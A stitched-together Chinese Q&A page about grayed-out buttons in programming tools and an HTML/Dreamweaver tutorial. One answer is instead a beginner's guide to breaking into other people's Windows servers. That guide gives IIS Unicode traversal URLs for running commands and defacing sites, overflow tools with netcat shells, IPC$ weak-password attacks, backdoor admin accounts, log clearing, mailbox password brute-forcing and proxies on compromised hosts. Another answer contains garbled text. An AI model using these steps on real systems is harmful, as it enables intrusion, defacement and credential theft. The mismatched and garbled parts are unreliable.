编程序时脚本出现灰色

① VC6.0无法执行compile命令,按钮变为灰色

为read，这是你的编写“程序”与电脑内存有“冲突”！原因总结起来，有以下方面，偶尔出现，点：取消，即可！1.去网上下载一个“read修复工具”，修复试试！2.再不行，重启电脑，开机后按“F8”，回车，回车，进到“安全模式”里找到：“最后一次正确配置”，回车，回车，按下去，看看效果如何！3.再不行，开始菜单，运行 ，输入cmd， 回车，在命令提示符下输入(复制即可) :for %1 in (%windir%\system32\*.ocx) do regsvr32 /s %1 粘贴，回车，再输入：for %1 in (%windir%\system32\*.dll) do regsvr32.exe /s %1回车！直到屏幕滚动停止为止，重启电脑！4.实在不行就“一键还原”系统或“重装系统”！

② keil5 load 不能用，编译完程序，load一直显示灰色什么情况

把debug设置成软件仿真了，改为jlink或你使用的工具就好了。

③ gx works3编写好程序后灰色如何变成白色

首先
_紫仍诠ぞ呃钢械慊鳌笆油肌薄忠吃だ溃_）然后鼠标放在蓝色线上，就会出现出现向上和向下的箭头，然后下拉那箭头就可以啦！（当然这个时候打印区域也就变了）。 另外的方法是：视图——普通（N）就可以啦！ 灰色的是不是在打印区域外？ 去除分页预览改为普通就可以了。

④ 考C语言二级的时候编写程序设计题为什么调试是灰色的

没关系，程序设计是结果正确就得分。

C语言程序的调试，主要取决于调试器的使用，比如windows可以使用VC/vs内置的调试器，也可以使用WinDbg（微软自己的专业调试器），也可以使用OllyDbg（环3级最常用的动态调试器），不同的调试器具体用法肯定不一样，但原理和核心操作类一样。

C语言是一门面向过程的、抽象化的通用程序设计语言，广泛应用于底层开发。C语言能以简易的方式编译、处理低级存储器。

C语言是仅产生少量的机器语言以及不需要任何运行环境支持便能运行的高效率程序设计语言。尽管C语言提供了许多低级处理的功能，但仍然保持着跨平台的特性，以一个标准规格写出的C语言程序可在包括类似嵌入式处理器以及超级计算机等作业平台的许多计算机平台上进行编译。

C语言的应用：

C语言是一门面向过程的计算机编程语言，与C++、C#、java等面向对象编程语言有所不同。C语言的设计目标是提供一种能以简易的方式编译、处理低级存储器、仅产生少量的机器码以及不需要任何运行环境支持便能运行的编程语言。

C语言描述问题比汇编语言迅速、工作量小、可读性好、易于调试、修改和移植，而代码质量与汇编语言相当。C语言一般只比汇编语言代码生成的目标程序效率低10%-20%。因此，C语言可以编写系统软件。

⑤ 网页代码全为灰色不能编辑怎么办

在这里，在这里我就不给你讲dreamweaver的使用了，只讲总结性的东西，要注意的技巧吧，在最后，也会写一两个用DW做的简单特效实例。

随便打开一个网页，点击查看，再点源代码，一般都可以看到这个网页的代码，做网页说白了，也就是把文字、图象等多媒体效果有机的结合在一起，DW和FP等只是书写代码的利器，只要你知道代码，用记事本也一样能做出精美的网页（真正的高手据说就是用记事本做网页），但对我们初学者来说，没有必要去记代码，只需知道利用DW或FP，能实现哪些操作，就象用WORD一样，画一条线就有一条线，画一个表格就有一个表格，在软件的演示窗口里，有着同WORD一样所见即所得的最后效果察看。因此，可以说，做网页入门很简单！可后面还有半句话：做好网页不简单！因为，一个好的网页，不单单是代码书写，更重要的是美工设计，内容的充实。虽然很多代码不需要一一手工书写，可有些代码的基本组织结构了解一些，还是对做网页大有帮助的。我们可以这样学习、研究代码：在用DW或FP中做了某一个操作，把效果与上面的代码窗口比较一下，就可以知道什么代码是实现什么效果的，还可以通过查看别人的网页的源代码分析学习。想学ASP网页的朋友们，有些基本代码是非记不可的。

现在很多做网页的人，都是用借鸡生蛋的办法做的网页，做法是从网上下载现成的网页模板，对模板稍加更改，替换下内容成了。当然，这也是新手们做网页速成的一种好办法。模板在很多有提供空间的网站都有下载。很多以前收录的网址，现在打开都没有用了，在这里，能提供给大家的，只有这些了。
1.源代码下载：要下载ASP源代码的可以到“中国站长站”去，网址：http://www.chinaz.com/download/，这是个比较权威的源代码下载点，在这里下到动网源码，说不定可以下到动网7.0 for SQL Server版本（excelhome的论坛就是用这个版本）。
2.网页图片及音乐等素材：http://www.dabaoku.com/sucai/shejilei/bj/
3.网页特效代码：推建一个小工具：“水晶情缘网页特效专家”，有1M，本来想发上来，太大了，算了，要的话，留下邮箱，我发过去。如，下雪的效果，鼠标滑动效果等，这里都有。

下面我把一些常用的写下来，以供大家参考：

DREAMWEAVER常用标记：（都是以前记的一些笔记了）
标记一般成对出现，一个表示特定代码部分的开始，另一个表示特定代码部分的结束(表示结束的前面带"/"符号)，但也不是绝对的，比如，<br>标记。基本的HTML标记：html、head和body必不可少。

1. <head>和</head>标记中仅包含网页标题(如<title>我的网页</title>)和程序脚本。

2. <body></body>标记中包含网页的全部内容。是网页的主体部分。

3. <center>和</center>：是中间内容居中标记；

4. <h2>和</h2>：从h1~h6，将文本标注为标题，通常要比正文粗大，h1最大；

5. <p>和</p>：段落标记，在行与行之间添加额外的空白行；

6. <br>：强行换行标记，插入单行，不需要封闭标记

7. 图象标记：<img src="aaa\\bbb.gif" width="500" height="198" align="center">

align水平对齐(left、right或center)，valign垂直对齐(top，bottom或middle)，border边框宽度

alt="鼠标放在图片上时出现的提示文字"

8. <p><font size="3"><b>本行字符将以粗体显示</b></font></p>

9. <p><font size="3"><i>本行字符将以斜体显示</i></font></p> (<i>等效于<em>)

10.<p><font size="3" face="宋体" color="#RRGGBB">本行字符将宋体显示</font></p>

11. <a href="test.htm">点击此处文字打开链接的网页</a> ：该处文字有下划线标示

12. <HR>显示一长灰色细线，分割网页为上下两部分。可以只用单边。完整的如下：

<HR align=center width="100%" SIZE=1>显示一灰色矩形，SIZE为1时，宽为1(很细，可看作一直线)

13.<LI>在文字前出现一个圆点的项目符号</LI>，可单个使用，也可结合<br>使用

14.<OL type=2 start=1><li>标记</li><li>区段</li></ol>：控制项目序号及显示方式，如1,2,3

15.<UL>使该段文字首行和下面都缩进约两个字符</UL>

16.<BLOCKQUOTE>使该段文字整体都缩进约两个字符，可以多重使用<BLOCKQUOTE>

17.<SUP>这是上标字</SUP>，<SUB>这是下标字</SUB>，<U>这是加下划线字</U>

18.<TT>这是Windows的等宽字</TT>

19.<FONT SIZE=+1>字体放大一级</FONT>

20.<DL><DT>语言<DD>基础要素</DL>:“语言”显示为列表标题，“基础要素”显示为列表内容，自动缩进。

21.<DIV Align="Right">这是右对齐的段落一<P>这是右对齐的段落二<P></DIV>默认为左对齐方式。

表格及其标志：Align:水平，Valign:垂直。Align或Valign写在<TR >中时表该行的几个列都用同一方式。

22<BLINK>闪烁</BLINK>:标记中的文字实现闪烁效果，但并不适用于所有的浏览器。

23.<TABLE BORDER=1> <TR><TD>第一列第一栏</TD><TD>第一列第二栏</TD></TR>

<TR BgColor="yellow"><TD >第二列的第一栏</TD><TD>第二列的第二栏</TD></TR>

<TR><TD Align="Left" Valign="Center">水平:左对齐<br>垂直:居中</TD></TR></TABLE>

BgColor可写在<TABLE>、<TR>、<TD>中，分别为整个表格、整行、单一单元格的背景颜色设置。

以上是我以前笔记中收录的一些常用的标记，今天看到lfspecter大虾也发了一些关于网页的帖子，可以两边对照着看，侧重点各有不同，也许更有利于初学者的理解，链接如下：http://club.excelhome.net/dispbbs.asp?boardID=100&;ID=78021&page=1

技巧篇：
1. 在<BODY>标签中可以规定整个文档的一些基本属性：
"bgcolor":指定html文档的背景色。
"text":指定html文档中文字的颜色。
"link":指定html文档中待连接超链接对象的颜色。
"alink":指定html文档中连接中超链接对象颜色。
"vlink":指定html文档中以连接超链接对象颜色。
"background":指定html文档的背景文件。 有两种方式表示颜色对象： <body bgcolor="green">或<body bgcolor="#00FF00">。文档主体部分可用颜色列表：black 黑色 Red 红色 Line 石灰色 Maroon 栗色 Gray 灰色 Silver 银白色 Navy 海军蓝 Olive 橄榄绿 Purple 紫色 Yellow 黄色Aqua 浅绿色 Blue 蓝色 Green 绿色 Fuchsia 紫红色 White 白色 Teal 暗蓝绿

2. 浏览器的状态列提示文字控制
(1).鼠标经过:<a href="tpage.htm" onMouseOver="window.status=\'相关提示\'; return true">页面上鼠标经过的文字<a>
(2).改变状态栏提示文字：打开"Behaviors"行为编辑窗，单击"＋"按钮，选择"Set Text Set"下的"Text Of Status Bar"选项，然后在方框中输入自己的文字，例如"欢迎来到我的主页"等，单击"确定"即可。

3.链接控制：
a. 返回前页：使用OnClick="history.go(-1)"
返回主页：使用OnClick=\'top.location.href="../index.html"\'
b. 链接提示:在链接语句中增加,如：去哪儿？ (在点击链接前注意看状态行显示的变化)
OnMouseOver="window.status=\'这里是 ...\'; return true" OnMouseOut="window.status=\'\'; return true"
c. 链接的不同方式:
在帧里显示：在链接处加target="main"语句，其中main为帧名
整页显示：在链接处加target="_top"语句
开新窗口：在链接处加target="resource window"语句，如<A HREF="index.htm" TARGET="resource window"></A>
d. 强制主页每次都不进行缓存，而从服务器上重读
在Head部分加<MEAT HTTP-EQUIV="Pragma" CONTENT="no-cache">
e. 自动刷新
定时刷新：<META HTTP-EQUIV="Refresh" content="10; URL=http://自己的URL">
幻灯片效果：语句类似上面，但在页面1中URL指向页面2，而页面2指向页面3 ... 页面n指回页面1，即可实现循环显示页面的效果。
f. 在某一个时间内自动链接到其他主页，这只需在〈title〉######〈/title〉之后加入下面这一行即可：
〈meta http-equiv="refresh" content="20; url=otherpage.htm"〉（"20"代表二十秒后连到另一个主页）
h. 在打开指定网页的同时打开另一指定网页\'next.htm，只需在指定网页的body中加入指令onload：
<html><body onload="parent.banner.location.href=\'next.htm\'">指定打开的一个网页内容</body>

4. 设置"添加到收藏夹"链接：
选中"添加到收藏夹"文字，在属性面板中的链接（Link）中输入："javascript :window.external.AddFavorite (\'http://www.excelhome.net\',\'学习之家\')"。点击此链接时会弹出对话框，可以将你的主页地址加到收藏夹中。

5.文字移动动态效果：
1) 文字从右移到左边：<marquee><b>大家好</b>欢迎您经常光临！</marquee>
2) 让文字在固定的区域内出现从下到上的滚动效果：
例1:<table height=542 cellspacing=0 cellpadding=0 width=800 border=0>
<tr><td valign=center align=middle width=316 height=405>
<marquee scrollamount=1 scrolldelay=140 direction=up width=382 height=403><center>谨以此网站送给xxx
<font color=#ff0000></font></center><br>此处为长篇大论!</marquee></td></tr></table>
例2:<body><div align="center"><p><marquee aligh=left bgcolor=#FFFED7 direction=up behavior=scroll height=100
hspace=1 scrollamount=2 Scrolldelay=1 width=250 VSpace=1 loop=-1>
<font color="#FF0000" size="5" face="方正大黑简体">望 岳</font><br> <br>
<font color="#FF0000">岱宗夫如何，齐鲁青未了。<br>造化钟神秀，阴阳割昏晓。<br>汤胸生层云，决眦入归鸟，<br>会当凌绝顶，一览众山小。<br></font></marquee></p></div></body></html>
3) 在指定宽度内移来移去的文字代码：<TD height=20><P align=center><MARQUEE scrollDelay=120 direction=right
behavior=alternate width=150 height=12>产品导航</MARQUEE></P></TD>

6.E-mail链接：
选中字或图片，在属性中设置Alt为"给我来信"，链接为"mailt [email protected]"，在浏览器中单击此图，就会启动发送邮件窗口。在链接地址前加"#"符号，可以在网页中不打开实际链接。

7.动画背景为透明：
选中Flash(gif)，在源代码</object></p>前加入代码：<param name="wmode" value="transparent">。或文件属性栏里 "参数"输入wmode,value="transparent"。

8.浮动背景图象(主页内容向下滚动而背景图象不动的效果)：
(1).<body backgroud="image.jpg" bgproperties="fixed">
(2).在Dreamweaver中用“Text”-“Custom Style”-“Edit Style Sheet”-“New”-Redefine HTML Tag中选择Body，然后在Background中的Attachment里选fixed

9.滚动条换颜色：
默认的网页滚动条是灰色，在网页代码<head></head>里插入一对<style></style>标签，标签里写入下面的代码：
body {SCROLLBAR-FACE-COLOR:#3333FF;(立体滚动条凸出部分的颜色)
SCROLLBAR-HIGHLIGHT-COLOR:#505050;(滚动条空白部分的颜色)
SCROLLBAR-SHADOW-COLOR:#fc2400;(立体滚动条阴影的颜色)
SCROLLBAR-ARROW-COLOR:#666666;(上下按钮上三角箭头的颜色)
SCROLLBAR-BASE-COLOR:#333333; (滚动条的基本颜色)
SCROLLBAR-DARK-SHADOW-COLOR:#b4fc48} (立体滚动条强阴影的颜色)
后面的16位颜色值你可以随意更改，括号内是解释说明，在输入时请不要插入。

10.背景音乐:
body中加入以下任一个代码（建议为midi格式的）：
显示操作面板：在相应地方加:
<embed src="aladdin.mid" width="140" height="35" autostart=true controls="middleconsole">
不显示操作面板：在页中任意地方加<embed src="aladdin.mid" hidden=true autostart=true loop=true>
<bgsound src=音乐路径 loop=次数>－1为无数次
<embed src=音乐路径 width=0 height=0>

11.在Dreamweaver中轻松设置行间距：
用层叠样式表（CSS）来实现，在Dreamweaver中编辑层叠样式表不用编写代码，具体操作方法如下：
（1）在快速启动栏中点击层叠样式表按钮（"show css styles"按钮），在弹出的CSS Styles面板上双击（none）；
（2）此时，可看到弹出的Edit Style Sheet 面板，在该面板上按New按钮；
（3）再在弹出的New Style 面板上点取Redefine HTML Tag（重新定义HTML标记），再在Tag中选择"body"标记后按OK按钮；
（4）这时可看到弹出的Style dehinition for body 的对话框，在此对话框中可以设置"body"标记的许多属性，可以按你的意愿设置，但我们这里主要是要设置行距，所以在line属性输入框中填上行距的像素点数，现在流行的九号字，行距一般用12，按OK按钮返回到Edit Style Sheet 面板，此时已把"body"的行距设置好了；
（5）由于"body"中定义的行距对表格不起作用，所以再在Edit Style Sheet 面板上再按New按钮；
（6）再在弹出的New Style
参考资料：http://www.dreamest.net/

⑥ ROS无法使用telnet操作，winbox下想添加脚本scripts的添加按钮灰色

由于网上很多朋友问我怎么入侵别人的机器，所以整理了一些我认为容易学的漏洞入侵方法，希望能给初学者一些帮助，下面讲的内容很简单，高手就不用浪费时间看了，：）

（1） UNICODE漏洞入侵
“Uicode漏洞”是微软IIS的一个重大漏洞。2001年最热门漏洞之一。
第一步，运行RANGSCAN扫描器，会出现扫描窗口，在最上面有两个from的横框，这是让你填一段IP范围的。在第一个框里填入启始域（打个比方，比如你要扫192.168.0.1至192.168.0.255）那么你在第一个框里就填入192.168.0.1，在to 后面的框里填入192.168.0.255 意思就是扫192.168.0.0至192.168.0.255这段范围里有UNICODE漏洞的机器。接着在中间有一个添加的横框，是要填入内容的如：
/scripts/..%c0%af../winnt/system32/cmd.exe
这句话的意思是扫描有 %c0%af 漏洞的机器，对象一般是英文的WIN2000机。
我们把/scripts/..%c0%af../winnt/system32/cmd.exe填入框里，再按一下添加。再按“扫描”。就看到RANGSCAN开始扫了。这时就要看你选的IP范围有漏洞的机器多不多了，如果你选的IP范围好，呵，很快在扫描结果框里就会显示扫到的漏洞主机
如192.168.0.111/scripts/..%c0%af../winnt/system32/cmd.exe
意思是192.168.0.111主机有 %c0%af 漏洞，
目标有了，我们马上打开浏览器。在网址栏里输入：
100.100.100.111/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 回车
意思是查看机器里C盘的根目录。一般情况下，我们都可以在浏览器里看到类似如：
Directory of c:\
2002-03-13 03:47p 289 default.asp
2002-02-11 03:47p 289 default.htm
2002-03-09 04:35p <DIR> Documents and Settings
2002-02-11 03:47p 289 index.asp
2002-02-11 03:47p 289 index.htm
2002-05-08 05:19a <DIR> Inetpub
2002-01-19 10:37p <DIR> MSSQL7
2002-03-09 04:22p <DIR> Program Files
2002-01-23 06:21p <DIR> WINNT
4 File(s) 1,156 bytes
5 Dir(s) 2,461,421,568 bytes free
------------------------------
的目录列表。也会碰到看不到文件的空目录。
好，我们成功看到了机器里的C盘了。
我们在浏览器里输入：
192.168.0.111/scripts/..%c0%af../winnt/system32/cmd.exe?/c+set 回车
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:

ALLUSERSPROFILE=C:\Documents and Settings\All Users
CommonProgramFiles=C:\Program Files\Common Files
COMPUTERNAME=ON
ComSpec=C:\WINNT\system32\cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST=192.168.0.111
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98; Win 9x 4.90)
HTTP_ACCEPT_ENCODING=gzip, deflate
HTTPS=off
INSTANCE_ID=1
LOCAL_ADDR=192.168.0.111
NUMBER_OF_PROCESSORS=1
Os2LibPath=C:\WINNT\system32\os2\dll;
OS=Windows_NT
Path=C:\WINNT\system32;C:\WINNT;C:\WINNT\System32\Wbem;C:\MSSQL7\BINN
PATH_TRANSLATED=c:\inetpub\wwwroot
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Fa
-----------------
哈，我们看到了机器设置内容了，我们找找，主要看PATH_TRANSLATED=c:\inetpub\wwwroot
意思是他的主页存放在c:\inetpub\wwwroot的目录里，知道就好办了。
我们用命令：
192.168.0.111/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\inetpub\wwwroot回车
我们就可以看到c:\inetpub\wwwroot目录里的文件了，一般都有default.asp, default.htm , index.htm, index.asp,等等。我们以目录里有index.asp做例子。
我们先要做的是把文件的只读属性解除掉，很多管理员都把文件设置只读。
我们用命令：
192.168.0.111/scripts/..%c0%af../winnt/system32/attrib.exe?%20-r%20-h%20c:\inetpub\wwwroot\index.asp 回车
当看到下面的英文
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:
恭喜你，你可以改他的网页了。
----------------------------------------
但如果你看到下面的英文就不成功，只好换其他机器了。
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
Access denied - C:\inetpub\wwwroot\index.asp
-----------------------------
继续。现在用ECHO改网页的内容。
100.100.100.111/scripts/..%c0%af../winnt/system32/cmd".exe?/c+echo+网站有漏洞+> c:\inetpub\wwwroot\index.asp 回车
当看到
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:
的提示，你已经改了他的网页了，呵呵，你想改成什么字也行。只要把命令中的中文换成你自己的中文就行了。

英文WIN2000
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
中文WIN2000
/scripts/..%c0%2f../winnt/system32/cmd.exe
/scripts/..%c1%1c../winnt/system32/cmd.exe
WIN NT4
/scripts/..%c1%9c../winnt/system32/cmd.exe
英文WIN2000
/scripts/..%c0%af../winnt/system32/cmd.exe
通用代码：/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\

（2） Windows2000输入法漏洞
先用端口扫描器扫描开放3389的机器，然后用终端客户端程序进行连接，用CTRL+SHIFT快速切换输入法，切换至全拼，这时在登录界面左下角将出现输入法状态条，在输入法状态条上按鼠标右键。选择“帮助” —— “输入法指南” —— “选项”。（如果发现“帮助”呈灰色，放弃，因为对方很可能发现并已经补上了这个漏洞。）按右键，选择“跳转到URL”，输入：c:\winnt\system32在该目录下找到“net.exe”，为“net.exe”创建一个快捷方式，右键点击该快捷方式，在“属性” —“目标”—c:\winnt\system32\net.exe 后面空一格，填入“user guest /active :yes”。 点击“确定”（目的是，利用“net.exe”激活被禁止使用的guest账户）运行该快捷方式。（此时你不会看到运行状态，但guest用户已被激活。）然后重复操作上面的，在 “属性” —— “目标”—— c:\winnt\system32\net.exe 后面空一格，填入localgroup administrators guest /add（这一步骤目的是，利用“net.exe”将guest变成系统管理员。）再次登录终端服务器，以“guest”身份进入，此时guest已是系统管理员，已具备一切可执行权及一切操作权限。现在，我们可以像操作本地主机一样，控制对方系统。
（3） idq溢出漏洞
要用到3个程序，一个Snake IIS IDQ 溢出程序GUI版本，一个扫描器，还有NC。
首先扫描一台有IDQ漏洞的机器，然后设置Snake IIS IDQ 溢出程序，在被攻击IP地址后面写上对方的IP.端口号一般不需要改动，软件的默认绑定CMD.EXE的端口是813.不改了.用默认的，左面选择操作系统类型，随便选一个，我们选IIS5 English Win2k Sp0吧，点击IDQ溢出~~OK~~出现发送Shellcode成功的提示了，然后我们用NC来连接。
进入MS-DOS。进入“nc”的目录。然后：nc --v IP 813
c:\>nc -vv IP 813
IP: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [IP] 813 (?): connection refused
sent 0, rcvd 0: NOTSOCK
c:\>

看来没成功. 别灰心，在来一次，换用IIS5 English Win2k Sp1试试。
c:\>nc -vv IP 813
IP: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [IP] 813 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>
哈哈，终于上来啦，你现在可是system权限，下面该怎么做就看你的啦。

（4）IDA溢出漏洞
所用程序：idahack
进入MS-DOS方式（假设idq.exe在c:\下）
c:\idahack.exe
运行参数：c:\idahack <host> <hostport> <hosttype> <shellport>
chinese win2k : 1
chinese win2ksp1: 2
chinese win2ksp2: 3
english win2k : 4
english win2ksp1: 5
english win2ksp2: 6
japanese win2k : 7
japanese win2ksp1: 8
japanese win2ksp2: 9
korea win2k : 10
korea win2ksp1: 11
korea win2ksp2: 12
chinese nt sp5 : 13
chinese nt sp6 : 14

c:\idahack 127.0.0.1 80 1 80
connecting...
sending...
Now you can telnet to 80 port
好 luck 
好，现在你可以telnet它的80端口了，我们用NC来连接。
C:\nc 127.0.0.1 80

Microsoft Windows 2000 [Version 5.00.2195]
（C）版权所有 1985-1998 Microsoft Corp
C:\WINNT\system32>
OK，现在我们现在上来了，也可IDQ一样是SYSTEN权限，尽情的玩吧。

（5）.printer漏洞
这个漏洞，我们用两个程序来入侵。iis5hack和nc。
C:\>iis5hack
iis5 remote .printer overflow. writen by sunx
http://www.sunx.org
for test only, dont used to hack, :p

usage: D:\IIS5HACK.EXE <Host> <HostPort> <HostType> <ShellPort>
用法: D:\IIS5HACK <溢出的主机> <主机的端口> <主机的类型> <溢出的端口>
chinese edition: 0
chinese edition, sp1: 1
english edition: 2
english edition, sp1: 3
japanese edition: 4
japanese edition, sp1: 5
korea edition: 6
korea edition, sp1: 7
mexico edition: 8
mexico edition, sp1: 9

c:\>iis5hack 127.0.0.19 80 1 119
iis5 remote .printer overflow. writen by sunx
http://www.sunx.org
for test only, dont used to hack, :p
Listn: 80

connecting...
sending...
Now you can telnet to 3739 port
好 luck

溢出成功！
c:\>nc 127.0.0.19 119
http://www.sunx.org

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>

OK，我们又成功取得system权限！玩吧。

（6）139端口入侵
我们先确定一台存在139端口漏洞的主机。用扫描工具扫描！比如SUPERSCAN这个端口扫描工具。假设现在我们已经得到一台存在139端口漏洞的主机，我们要使用nbtstat -a IP这个命令得到用户的情况！现在我们要做的是与对方计算机进行共享资源的连接。
用到两个NET命令，下面就是这两个命令的使用方法
NET VIEW?
作 用：显示域列表、计算机列表或指定计算机的共享资源列表。?
命令格式：net view [\\computername | /domain[:domainname]]?
参数介绍：?
<1>键入不带参数的net view显示当前域的计算机列表。?
<2>\\computername 指定要查看其共享资源的计算机。?
<3>/domain[:domainname]指定要查看其可用计算机的域?

NET USE?
作用：连接计算机或断开计算机与共享资源的连接，或显示计算机的连接信息。?
命令格式：net use [devicename | *] [\\computername\sharename[\volume]]?
[password | *]] [/user:[domainname\]username] [[/delete] |?
[/persistent:{yes | no}]]?
参数介绍：?
键入不带参数的net use列出网络连接。?
devicename指定要连接到的资源名称或要断开的设备名称。?
\\computername\sharename服务器及共享资源的名称。?
password访问共享资源的密码。?
*提示键入密码。 /user指定进行连接的另外一个用户。?
domainname指定另一个域。?
username指定登录的用户名。?
/home将用户连接到其宿主目录?
/delete取消指定网络连接。?
/persistent控制永久网络连接的使用。?
C:\net use \\IP
C:\net view \\IP
我们已经看到对方共享了他的C，D，E三个盘
我们要做的是使用NBTSTAT命令载入NBT快取.
c:\>nbtstat –R 载入NBT快取
c:\>nbtstat –c 看有无载入NBT快取
现在我们已经得到的139端口漏洞的主机IP地址和用户名，现在就该是我们进入他计算的时候了，点击开始---查找--计算机，将刚才找到的主机名字输入到上面，选择查找，就可以找到这台电脑了！双击就可以进入，其使用的方法和网上领居的一样。

（7）IPC入侵
所有程序：流光
开始：在主界面选择 探测→探测POP3/FTP/NT/SQL主机选项，或者直接按Ctrl+R。输入我们要破解的IP段，我们把“将FrontPage主机自动加入HTTP主机列表取消了”。因为我们只想获得IPC弱口令，这样可以加快扫描的速度 ：）填入IP，选择扫描NT/98主机。在“辅助主机”那里的“IPC$主机”前面打勾,然后在菜单了选“探测”，，扫描出结果以后，“IPC$主机”，选中后按“CTRL+F9”就开始探测IPC用户列表。会出现“IPC自动探测”
的窗体，把那两个选项都选了，然后点“选项” 为了加快弱口令扫描速度，这里的两个选项我们可以全部取消记住。然后点“确定”出来后点“是”就开始探测了。一会儿，结果出来了。比如我们探测出了用户名为“admin”的管理员，密码为“admin”，现在我们用命令提示符，熟悉下命令吧，输入:
net use file://对方ip/ipc$ "密码" /user:"用户名" || 建立远程连接
icmd.exe file://对方ip/admin$ || admin$是对方的winnt目录
net time file://对方IP/ || 看看对方的本地时间
at file://对方ip/ 启动程序的时间 启动程序名 启动程序的参数 || 用at命令来定时启动程序
telnet 对方ip 端口

我们也可以改网页：
net use \\ip\ipc$ "admin" /uesr:"admin" 回车。
出现“命令成功完成”。
然后输入“dir \\ip\c$\*.*”
看到C:下所有内容。现在我们来改主页。一般主页放在c:\inetpub\wwwroot里面
输入“dir \\ip\c$\inetpub\wwwroot\*.*”。就可以看到index.htm或index.asp或default.htm或 default.asp.这些就是主页了，假如你黑页在C:下，就输入" 主页文件 \\ip\c$\inetpub\wwwroot"覆盖原文件这样就行了，简单吧？

日志清除，断开连接 ：
我们 cl.exe ，clear.exe 上去，再执行，就可以清除日志，比如clear all ：清除所有的日志。然后在断开连接：net use file://ip/ipc$ /delete

（8）超管SA空密码漏洞
使用的工具:流光IV
启动流光，按Ctrl+R。出现扫描设置对话框，设置扫描IP段，并且选择扫描的类型为SQL。点击“确定”，进行扫描，假设我们取得主机：127.0.0.1，然后点击“工具” —— SQL远程命令（或者Ctrl+Q），填入主机IP（127.0.0.1）、用户（sa）、密码（空）点击“连接”，出现远程命令行的界面。
net user heiying heiying1 /add 填加一个heiying的帐号和密码heiying1
net localgroup administrators heiying /add 将我们创建的heiying帐号填加到管理组。
下面我们来做跳板：
打开cmd.exe,输入net use \\127.0.0.1\ipc$ "heiying1" /user:"heiying"命令
显示命令成功完成。
上传srv.exe：
srv.exe \\127.0.0.1\admin$\system32
上传ntlm.exe：
ntlm.exe \\127.0.0.1\admin$\system32
启动服务：
首先用net time \\127.0.0.1
看看对方主机的时间,(假如回显\\127.0.0.1 的本地时间是上午12.00)，然后我们用at \\2127.0.0.1 12.01 srv.exe命令来启动srv.exe。等一分钟后就可以telnet了。
一分钟后在本机命令提示符中输入：
telnet X.X.X.X 99
然后我们要启动NTLM.exe：
在telnet状态下直接输入ntlm回车。
显示：windows 2000 telnet mp,by assassin,all rights reserved.done!
然后从新启动对方主机的telnet服务：net stop telnet（先关闭telnet服务）再输入net start telnet（启动telnet服务）然后我们退出telnet，然后在命令行下输入telnet 127.0.0.1,依照提示,接着输入用户名：heiying,密码：heiying1，回车。这样,我们的跳板就做好了，简单吧？
（上面上传的srv和ntlm等东东还有一个简便方法，全都可以直接用流光工具菜单里的种植者上传，60秒后自动运行，不用敲命令！呵呵~~~~方便吧！）

（9）如何用流光破解信箱密码
这次的目标是21CN，运行流光IV，选择POP3主机----右键----编辑----添加，填上：pop.21cn.com，其他的就用默认吧！不用更改，确定就行了。到下一步，还是右键-----从列表中添加------选择一个字典，没有的到网上下载一个字典，或者到黑白网络去下载，我们用简单模式探测！这样速度比较快，然后就等着成果吧，上次我以下就破了5个邮箱出来。

（10）frontpage进行攻击
打开您自己的Frontpage，文件菜单下选择“打开站点”，然后在文件夹框里写入http://127.0.0.1（http://不要漏掉）。按下“打开”按钮，一会后，出现了文件夹，成功了，现在就可以操作网页文件了。如果跳出错误信息，表示有密码，我们用以下http://127.0.0.1/_vti_pvt/service.pwd,这是默认的密码文件，下载下来，找个解密器破密码吧！破出来后就还可以改网页。这个只能改该网页，没什么玩的。

（11）用肉鸡做SOCK5代理跳板
需要软件：srv.exe，ntlm.exe，snakeSksockserver.exe，SocksCap.exe。
首先我们在命令提示符下建立IPC$管道：
net use \\127.0.0.1\ipc$ "密码" /user:帐号
通道建立好后，我们把srv.exe sss.exe ntlm.exe全部上传。
c:\ srv.exe \\10.10.10.10\admin$
1 files copied!
c:\ ntlm.exe \\10.10.10.10\admin$
1 files copied!
c:\ sss.exe \\10.10.10.10\admin$
1 files copied!
复制完毕后，
看肉鸡上现在的时间：
c:\net time \\127.0.0.1
显示当前时间是 2002/4/13 晚上 09：00
我们来启动srv.exe
c:\at \\127.0.0.1 09:01 srv.exe
等到09：01后。我们来连接肉鸡：
c:\telnet 127.0.0.1 99
连上后显示：
c:\winnt\system32>
接着我们启动NTLM.exe
c:\winnt\system32>ntlm
显示：
Windows 2000 Telnet Dump, by Assassin, All Rights Reserved.
Done!
C:\WINNT\system32>
首先我们终止srv.exe的telnet服务：
C:\WINNT\system32>net stop telnet
继续：
C:\WINNT\system32>net start telnet
再启动TELNET。
OK，我们来登陆
c:>telnet 127.0.0.1
*==========================================================
Microsoft Telnet
*==========================================================
c:>
好了，一切顺利，我们现在正式开始做代理：
c:>sss.exe -install <---------开始安装
显示：
c:>sksockserver installed!
来看看配置：
c:>sss -config show
显示：
SkServer Port = 1813 <----开放服务的端口 ,我们记着这个1813端口哦
SkServer StartType: 3 - Manual <---服务启动方式
SkServer Enable Client Set Num:0 <---客户端的项目个数
SkServer Pass SkServer Number:0 <---经过SkServer的项目个数

来启动服务：
c:>net start skserver
提示你正在启动，并且完成。
